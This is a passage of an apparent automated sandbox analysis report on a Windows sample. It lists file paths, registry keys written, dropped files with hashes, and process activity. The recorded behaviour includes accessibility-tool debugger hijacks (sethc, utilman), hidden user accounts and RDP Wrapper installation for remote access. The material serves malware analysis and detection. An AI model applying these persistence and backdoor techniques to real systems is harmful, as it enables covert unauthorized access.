"C:\\Python27\\Scripts\\takeown",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\timeout.*",
"C:\\Python27\\cacls",
"C:\\Windows\\System32\\Find.*",
"C:\\Windows\\y",
"C:\\Python27\\Reg",
"C:\\Python27\\takeown.*",
"C:\\Python27\\reg.*",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\cacls.*",
"C:\\Windows\\System32\\wbem\\subinacl.exe",
"C:\\Python27\\subinacl.exe.*",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\U.bat",
"C:\\Windows\\System32\\takeown.exe",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\RDPWInst.*",
"C:\\Python27\\timeout.*",
"C:\\Windows\\System32\\reg.*",
"C:\\Windows\\System32\\cacls.COM",
"C:\\Python27\\Reg.*",
"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\subinacl.exe",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\subinacl.exe.*",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\attrib.*",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\attrib",
"C:\\Python27\\Scripts\\Reg.*",
"C:\\Windows\\System32\\dllcache\\sethc.exe",
"C:\\Windows\\System32\\reg.COM",
"C:\\Windows\\System32\\attrib.exe",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\takeown.*",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\RDPWInst.exe",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\SH.bat",
"C:\\Windows\\System32\\wbem\\WMIC.*",
"C:\\Windows\\WMIC",
"C:\\Python27\\Find",
"C:\\Python27\\y",
"C:\\Python27\\WMIC",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\takeown",
"C:\\Python27\\Scripts\\attrib.*",
"C:\\Python27\\Scripts\\y.*",
"C:\\Python27\\Scripts\\cacls.*",
"C:\\Windows\\System32\\takeown.*",
"C:\\Python27\\Scripts\\timeout",
"C:\\Python27\\Scripts\\WMIC",
"C:\\Python27\\Reg.exe.*",
"C:\\Windows\\System32\\subinacl.exe.*",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\Find.*",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\RDPWInst.ENU",
"C:\\Windows\\System32\\wbem\\WMIC.COM",
"C:\\Windows\\System32\\net.COM",
"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\y",
"C:\\Windows\\System32\\WMIC.*",
"C:\\Windows\\System32\\cacls.exe",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\sc.*",
"C:\\Python27\\y.*",
"C:\\Windows\\y.*",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\Find",
"C:\\Python27\\Scripts\\WMIC.*",
"C:\\Python27\\WMIC.*",
"C:\\Windows\\System32\\subinacl.exe",
"C:\\Python27\\Scripts\\Reg",
"C:\\Python27\\Scripts\\takeown.*",
"C:\\Windows\\System32\\dllcache",
"C:\\Users",
"C:\\Python27\\sc.*",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\RDPWInst.en-US",
"C:\\Windows\\WMIC.*",
"C:\\Documents and settings\\ontar",
"C:\\Python27\\timeout",
"C:\\Python27\\Scripts\\netsh.*",
"C:\\Python27\\netsh.*",
"C:\\Users\\cuck",
"C:\\Windows\\System32\\find.exe",
"C:\\Windows\\System32\\sc.*",
"C:\\Users\\cuck\\AppData\\Local",
"C:\\Users\\ontar",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\RDPWInst.COM",
"C:\\Windows\\System32\\netsh.*",
"C:\\Windows\\System32\\sethc.exe",
"C:\\Python27\\Scripts\\sc",
"C:\\Python27\\attrib.*",
"C:\\Windows\\subinacl.exe.*",
"C:\\Windows\\System32\\reg.exe",
"C:\\Python27\\attrib",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\cacls",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\Reg.exe",
"C:\\Windows\\System32\\y",
"C:\\Users\\cuck\\AppData",
"C:\\Windows\\subinacl.exe",
"C:\\Python27\\takeown",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\Reg.exe.*",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\903e0a66880cf6fbf4c39dff9735439084332daebaa2bdfede3b43fcbd60e46a.bin",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\Reg",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\timeout",
"C:\\Windows\\System32",
"C:\\Windows\\System32\\wbem\\WMIC.exe",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\prop.exe",
"C:\\Python27\\Scripts\\Find",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\Reg.*",
"C:\\Windows\\System32\\cmd.exe",
"C:\\Python27\\Scripts\\timeout.*",
"C:\\Windows\\System32\\net.*",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\subinacl.exe",
"C:\\Python27\\net.*",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\reg",
"C:\\Python27\\Scripts\\sc.*",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\Pt7.bat",
"C:\\Windows\\System32\\wbem\\y",
"C:\\Windows\\System32\\netsh.exe",
"C:\\Documents and settings\\*.*",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\reg.*",
"C:\\Python27\\net",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\netsh.*",
"C:\\Python27\\Scripts\\Find.*",
"C:\\Python27\\Scripts\\Reg.exe.*",
"C:\\Windows\\System32\\wbem\\y.*",
"C:\\Python27\\netsh",
"C:\\Python27\\sc",
"C:\\Windows\\System32\\wbem\\XSL-Mappings.xml",
"C:\\Windows\\System32\\y.*",
"C:\\Python27\\Scripts\\y",
"C:\\Python27\\Scripts\\reg",
"C:\\Windows\\System32\\timeout.exe",
"C:\\Python27\\subinacl.exe",
"C:\\Windows\\SysWOW64\\dllcache\\sethc.exe",
"C:\\Windows\\System32\\sc.COM",
"C:\\Windows\\System32\\cacls.*"
],
"regkey_written": [
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\Machine\\GPO-List\\0\\Version",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\WinStations\\RDP-Tcp\\MaxConnectionTime",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\Licensing Core\\EnableConcurrentSessions",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\SystemRestore\\RPLifeInterval",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\Machine\\Extension-List\\{00000000-0000-0000-0000-000000000000}\\EndTimeLo",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\\debugger",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList\\helpassistant",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Terminal Services\\UserAuthentication",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\ibhost.exe\\debugger",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Windows10Upgrade.exe\\debugger",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\WinStations\\RDP-Tcp\\MaxIdleTime",
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\@%SystemRoot%\\system32\\eapqec.dll,-101",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Narrator.exe\\debugger",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Magnify.exe\\debugger",
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\@%SystemRoot%\\system32\\eapqec.dll,-102",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\AllowTSConnections",
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\@%SystemRoot%\\system32\\napipsec.dll,-4",
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\@%SystemRoot%\\system32\\napipsec.dll,-2",
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\@%SystemRoot%\\system32\\napipsec.dll,-3",
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\@%SystemRoot%\\system32\\napipsec.dll,-1",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\SharedAccess\\Epoch\\Epoch",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\AllowMultipleTSSessions",
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\LanguageList",
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\@%SystemRoot%\\system32\\dhcpqec.dll,-103",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\TermService\\Parameters\\ServiceDll",
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\@%SystemRoot%\\system32\\dhcpqec.dll,-101",
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\@%SystemRoot%\\system32\\dhcpqec.dll,-100",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList\\ontar",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\WinStations\\RDP-Tcp\\UserAuthentication",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\Machine\\Extension-List\\{00000000-0000-0000-0000-000000000000}\\StartTimeLo",
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\@%SystemRoot%\\system32\\eapqec.dll,-100",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\uddisrw.exe\\debugger",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\fDenyTSConnections",
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\@%SystemRoot%\\system32\\eapqec.dll,-103",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\EOSNotify.exe\\debugger",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\History\\{35378EAC-683F-11D2-A89A-00C04FBBCFA2}\\0\\Version",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\WinStations\\RDP-Tcp\\MaxDisconnectionTime",
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\@%SystemRoot%\\system32\\tsgqec.dll,-101",
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\@%SystemRoot%\\system32\\tsgqec.dll,-100",
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\@%SystemRoot%\\system32\\tsgqec.dll,-103",
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\@%SystemRoot%\\system32\\tsgqec.dll,-102",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe\\debugger",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\Status\\GPExtensions\\{35378EAC-683F-11D2-A89A-00C04FBBCFA2}\\LastPolicyTime",
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\@%SystemRoot%\\system32\\dhcpqec.dll,-102"
]
}Dropped
[
{
"yara": [],
"sha1": "133ed4786d763474f0ff68f01f0d2e76bb215a06",
"name": "a2b968bb37b98cb8_rdpwrap.ini",
"filepath": "C:\\Windows\\System32\\rdpwrap.ini",
"type": "ASCII text, with CRLF line terminators",
"sha256": "a2b968bb37b98cb814502c93c6a302dc9ccb0d576c0d7008d6a9e24ec5d876b5",
"urls": [],
"crc32": "132AC000",
"path": "\/home\/hpuser\/.cuckoo\/storage\/analyses\/3817\/files\/a2b968bb37b98cb8_rdpwrap.ini",
"ssdeep": null,
"size": 136703,
"sha512": "978310e8dad3e1b3a58ecb31d87268b466042e63d8ed0ef077e539fa67f78633befd3ef64ee56f1551685ca4cd7af14c12e7434bc5ad3d860a2f945693d082d7",
"pids": [
3128
],
"md5": "1e6595624cd6cf11e2a907f9bb208b10"
},
{
"yara": [],
"sha1": "11ffeabbe42159e1365aa82463d8690c845ce7b7",
"name": "ac92d4c6397eb445_rdpwinst.exe",
"filepath": "C:\\Users\\cuck\\AppData\\Local\\Temp\\RDPWInst.exe",
"type": "PE32 executable (console) Intel 80386, for MS Windows",
"sha256": "ac92d4c6397eb4451095949ac485ef4ec38501d7bb6f475419529ae67e297753",
"urls": [
"http:\/\/www.apache.org\/licenses\/LICENSE-2.0",
"http:\/\/www.apache.org\/licenses\/"
],
"crc32": "D5C50564",
"path": "\/home\/hpuser\/.cuckoo\/storage\/analyses\/3817\/files\/ac92d4c6397eb445_rdpwinst.exe",
"ssdeep": null,
"size": 1460224,
"sha512": "c25b28a340a23a9fa932aa95075f85fdd61880f29ef96f5179097b652f69434e0f1f8825e2648b2a0de1f4b0f9b8373080a22117974fcdf44112906d330fca02",
"pids": [
2740
],
"md5": "3288c284561055044c489567fd630ac2"
},
{
"yara": [],
"sha1": "b3892eef846c044a2b0785d54a432b3e93a968c8",
"name": "798af20db39280f9_rdpwrap.dll",
"filepath": "C:\\Windows\\System32\\rdpwrap.dll",
"type": "PE32+ executable (DLL) (GUI) x86-64, for MS Windows",
"sha256": "798af20db39280f90a1d35f2ac2c1d62124d1f5218a2a0fa29d87a13340bd3e4",
"urls": [],
"crc32": "CF004A91",
"path": "\/home\/hpuser\/.cuckoo\/storage\/analyses\/3817\/files\/798af20db39280f9_rdpwrap.dll",
"ssdeep": null,
"size": 116736,
"sha512": "421f9060c4b61fa6f4074508602a2639209032fd5df5bfc702a159e3bad5479684ccb3f6e02f3e38fb8db53839cf3f41fe58a3acad6ec1199a48dc333b2d8a26",
"pids": [
3128
],
"md5": "461ade40b800ae80a40985594e1ac236"
},
{
"yara": [],
"sha1": "9daecb1ee5d7cbcf46ee154dd642fcd993723a9b",
"name": "dd94bf73f0e3652b_sethc.exe",
"filepath": "C:\\Windows\\System32\\sethc.exe",
"type": "PE32+ executable (GUI) x86-64, for MS Windows",
"sha256": "dd94bf73f0e3652b76cfb774b419ceaa2082bc7f30cc34e28dfa51952fa9ccb5",
"urls": [],
"crc32": "619062B8",
"path": "\/home\/hpuser\/.cuckoo\/storage\/analyses\/3817\/files\/dd94bf73f0e3652b_sethc.exe",
"ssdeep": null,
"size": 279040,
"sha512": "69d231132f488fd7033349f232db1207f88f1d5cb84f5422adf0dd5fb7b373dada8fdfac7760b8845e5aab00a7ae56f24d66bbb8aa70c3c8de6ec5c31982b4df",
"pids": [],
"md5": "3bcb70da9b5a2011e01e35ed29a3f3f3"
},
{
"yara": [],
"sha1": "d5b2addd3a37af3685055d4f68cf43a477ee4a1b",
"name": "34d082a73feb2512_Pt7.bat",
"filepath": "C:\\Users\\cuck\\AppData\\Local\\Temp\\Pt7.bat",
"type": "ASCII text, with CRLF line terminators",
"sha256": "34d082a73feb25127854dde876962bc4b7c0c28b08d17809e54fb0b39da11abc",
"urls": [],
"crc32": "6716AA2F",
"path": "\/home\/hpuser\/.cuckoo\/storage\/analyses\/3817\/files\/34d082a73feb2512_Pt7.bat",
"ssdeep": null,
"size": 100,
"sha512": "1ea6a29871bf2a802322cfbdd18b4c5db78d8dd3e99aa578e9bbe10b262e40966aa8357e74a58229e69dfcfd3d7a3e125ba039af60687899a7024179c401a59a",
"pids": [
2740,
1432
],
"md5": "7927ac8478729c094f986ef74c226c99"
},
{
"yara": [],
"sha1": "57a38e4649b34e4bb36b778c17de0804ac418132",
"name": "896fe05ecf0c6826_SH.bat",
"filepath": "C:\\Users\\cuck\\AppData\\Local\\Temp\\SH.bat",
"type": "ASCII text, with CRLF line terminators",
"sha256": "896fe05ecf0c6826cb5265a43118fc242ecc7a5457e487a0976a73c514a4a16d",
"urls": [],
"crc32": "6DACCF92",
"path": "\/home\/hpuser\/.cuckoo\/storage\/analyses\/3817\/files\/896fe05ecf0c6826_SH.bat",
"ssdeep": null,
"size": 4729,
"sha512": "2f539290cb27bd88cdf73e976a9a77de951cdc2f428669bc472470cf9775f7c3e4c351e5eabdafeef074954fdd8efe61096a09dc1f1a2ee4ba72426e263378c7",
"pids": [
2740,
2988
],
"md5": "21ef54fce2b94d13c5c8bc294fbc5e11"
},
{
"yara": [],
"sha1": "da39a3ee5e6b4b0d3255bfef95601890afd80709",
"name": "e3b0c44298fc1c14___tmp_rar_sfx_access_check_34896828",
"type": "empty",
"sha256": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855",
"urls": [],
"crc32": "00000000",
"path": "\/home\/hpuser\/.cuckoo\/storage\/analyses\/3817\/files\/e3b0c44298fc1c14___tmp_rar_sfx_access_check_34896828",
"ssdeep": null,
"size": 0,
"sha512": "cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e",
"md5": "d41d8cd98f00b204e9800998ecf8427e"
},
{
"yara": [],
"sha1": "4b84fedea40c4db502427cbc9e0ceffb18bf7033",
"name": "7b0fd59157936cba_prop.exe",
"filepath": "C:\\Users\\cuck\\AppData\\Local\\Temp\\prop.exe",
"type": "PE32 executable (GUI) Intel 80386, for MS Windows",
"sha256": "7b0fd59157936cbaa2fe204fba06b22f11bfc5373aa7ea918a5c0e42035094bd",
"urls": [],
"crc32": "0AA730E5",
"path": "\/home\/hpuser\/.cuckoo\/storage\/analyses\/3817\/files\/7b0fd59157936cba_prop.exe",
"ssdeep": null,
"size": 172048,
"sha512": "05bddf16831b456a66936af181bac73e23131e2d0698db0d1a93b51c60fdaedff1a389e6adf3cb619921211147ce54ca6c5be25dab4c79169e914dcc0b2a50ae",
"pids": [
2740
],
"md5": "48522d32f014350cb5b8d55ca8b52678"
},
{
"yara": [],
"sha1": "61bc86addcc641dc79cf84072fc04fa738d0596d",
"name": "4ea90ef6db17221b_sethc.exe",
"filepath": "C:\\Windows\\SysWOW64\\sethc.exe",
"type": "PE32 executable (GUI) Intel 80386, for MS Windows",
"sha256": "4ea90ef6db17221b9e74f9bd390f65e9877eac59a39fccd900dccad7d986a1ad",
"urls": [],
"crc32": "A78C92FF",
"path": "\/home\/hpuser\/.cuckoo\/storage\/analyses\/3817\/files\/4ea90ef6db17221b_sethc.exe",
"ssdeep": null,
"size": 270336,
"sha512": "6b89da909ab6c392cee096a1479071f2a623363ade53b1c1f8e35af3e3004793c092123c8d4d0109b52d067f09262c330426646444aefaaa19da9ed9354af0a0",
"pids": [],
"md5": "8c545f6f1ba83c15b8b02ee4aa62ff11"
},
{
"yara": [],
"sha1": "24eaf089fb2ee36cd3a34dd01e02b64129141f4b",
"name": "2518161204f8820f_U.bat",
"filepath": "C:\\Users\\cuck\\AppData\\Local\\Temp\\U.bat",
"type": "ASCII text, with very long lines, with CRLF line terminators",
"sha256": "2518161204f8820fd24146274473d0665cfd66fd460ac63aba3adad001386be8",
"urls": [],
"crc32": "ED24F254",
"path": "\/home\/hpuser\/.cuckoo\/storage\/analyses\/3817\/files\/2518161204f8820f_U.bat",
"ssdeep": null,
"size": 5377,
"sha512": "077fbb8ccc5a966cbb29a23748c59503f668c1e00ee1c20114176257d13c9736f23ae1b496612fc512332103d46e3a48a1662e6fbf8858583841e4d4ed5f7b11",
"pids": [
2740,
2588
],
"md5": "c370ac7150b1d23ebb5cf92f80e723f2"
}
]Generic
[
{
"process_path": "C:\\Windows\\SysWOW64\\reg.exe",
"process_name": "reg.exe",
"pid": 3584,
"summary": {
"file_opened": [
"C:\\Windows\\SysWOW64\\en-US\\KERNELBASE.dll.mui",
"C:\\Windows\\Globalization\\Sorting\\sortdefault.nls"
],
"regkey_opened": [
"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System",
"HKEY_LOCAL_MACHINE\\software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList"
],
"regkey_read": [
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList\\ontar",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\GRE_Initialize\\DisableMetaFiles",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\en-US",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\ExtendedLocale\\en-US"
],
"dll_loaded": [
"kernel32.dll"
],
"regkey_written": [
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList\\ontar"
]
},
"first_seen": 1574704402.109249,
"ppid": 2588
},
{
"process_path": "C:\\Windows\\SysWOW64\\reg.exe",
"process_name": "reg.exe",
"pid": 1036,
"summary": {
"file_opened": [
"C:\\Windows\\SysWOW64\\en-US\\KERNELBASE.dll.mui",
"C:\\Windows\\Globalization\\Sorting\\sortdefault.nls"
],
"regkey_opened": [
"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System",
"HKEY_LOCAL_MACHINE\\system\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp"
],
"regkey_read": [
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\WinStations\\RDP-Tcp\\MaxDisconnectionTime",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\GRE_Initialize\\DisableMetaFiles",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\en-US",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\ExtendedLocale\\en-US"
],
"dll_loaded": [
"kernel32.dll"
],
"regkey_written": [
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\WinStations\\RDP-Tcp\\MaxDisconnectionTime"
]
},
"first_seen": 1574704401.734249,
"ppid": 2588
},
{
"process_path": "C:\\Windows\\SysWOW64\\net1.exe",
"process_name": "net1.exe",
"pid": 528,
"summary": {
"file_recreated": [
"\\Device\\KsecDD"
],
"dll_loaded": [
"rpcrt4.dll",
"NETMSG",
"CRYPTBASE.dll",
"SAMLIB.dll",
"RPCRT4.dll"
],
"file_opened": [
"\\\\?\\PIPE\\lsarpc",
"\\\\?\\PIPE\\samr"
],
"regkey_opened": [
"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Rpc",
"HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows NT\\Rpc"
],
"file_written": [
"\\\\?\\PIPE\\lsarpc",
"\\\\?\\PIPE\\samr"
],
"file_read": [
"\\\\?\\PIPE\\lsarpc",
"\\\\?\\PIPE\\samr"
],
"regkey_read": [
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Language\\InstallLanguageFallback",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\en-US",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Locale\\00000409",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Rpc\\MaxRpcSize",
"HKEY_LOCAL_MACHINE\\SYSTEM\\Setup\\SystemSetupInProgress",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Language Groups\\1",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SQMClient\\Windows\\CEIPEnable",
"HKEY_CURRENT_USER\\Control Panel\\Desktop\\PreferredUILanguages",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\UILanguages\\en-US\\Type",
"HKEY_LOCAL_MACHINE\\SYSTEM\\Setup\\OOBEInProgress",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\Windows Error Reporting\\WMR\\Disable",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\UILanguages\\en-US\\AlternateCodePage",
"HKEY_CURRENT_USER\\Control Panel\\Desktop\\MuiCached\\MachinePreferredUILanguages",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\EMPTY",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\ComputerName\\ActiveComputerName\\ComputerName",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\ExtendedLocale\\en-US"
]
},
"first_seen": 1574704387.077999,
"ppid": 3036
},
{
"process_path": "C:\\Windows\\SysWOW64\\reg.exe",
"process_name": "reg.exe",
"pid": 3092,
"summary": {
"file_opened": [
"C:\\Windows\\SysWOW64\\en-US\\KERNELBASE.dll.mui",
"C:\\Windows\\Globalization\\Sorting\\sortdefault.nls"
],
"regkey_opened": [
"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\uddisrw.exe"
],
"regkey_read": [
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\uddisrw.exe\\debugger",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\GRE_Initialize\\DisableMetaFiles",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\Windows Error Reporting\\WMR\\Disable",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\en-US",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\ExtendedLocale\\en-US"
],
"dll_loaded": [
"kernel32.dll"
],
"regkey_written": [
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\uddisrw.exe\\debugger"
]
},
"first_seen": 1574704388.499876,
"ppid": 2988
},
{
"process_path": "C:\\Windows\\SysWOW64\\reg.exe",
"process_name": "reg.exe",
"pid": 4124,
"summary": {
"file_opened": [
"C:\\Windows\\SysWOW64\\en-US\\KERNELBASE.dll.mui",
"C:\\Windows\\Globalization\\Sorting\\sortdefault.nls"
],
"regkey_opened": [
"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\SharedAccess\\Epoch"
],
"regkey_read": [
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\GRE_Initialize\\DisableMetaFiles",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\SharedAccess\\Epoch\\Epoch",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\en-US",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\ExtendedLocale\\en-US"
],
"dll_loaded": [
"kernel32.dll"
],
"regkey_written": [
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\SharedAccess\\Epoch\\Epoch"
]
},
"first_seen": 1574704405.781124,
"ppid": 2588
},
{
"process_path": "C:\\Windows\\SysWOW64\\sc.exe",
"process_name": "sc.exe",
"pid": 3104,
"summary": {
"file_opened": [
"C:\\Windows\\SysWOW64\\en-US\\sc.exe.mui",
"C:\\Windows\\SysWOW64\\en-US\\KERNELBASE.dll.mui"
],
"regkey_read": [
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Language\\InstallLanguageFallback",
"HKEY_CURRENT_USER\\Control Panel\\Desktop\\PreferredUILanguages",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\UILanguages\\en-US\\Type",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\Windows Error Reporting\\WMR\\Disable",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\UILanguages\\en-US\\AlternateCodePage",
"HKEY_CURRENT_USER\\Control Panel\\Desktop\\MuiCached\\MachinePreferredUILanguages",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\EMPTY"
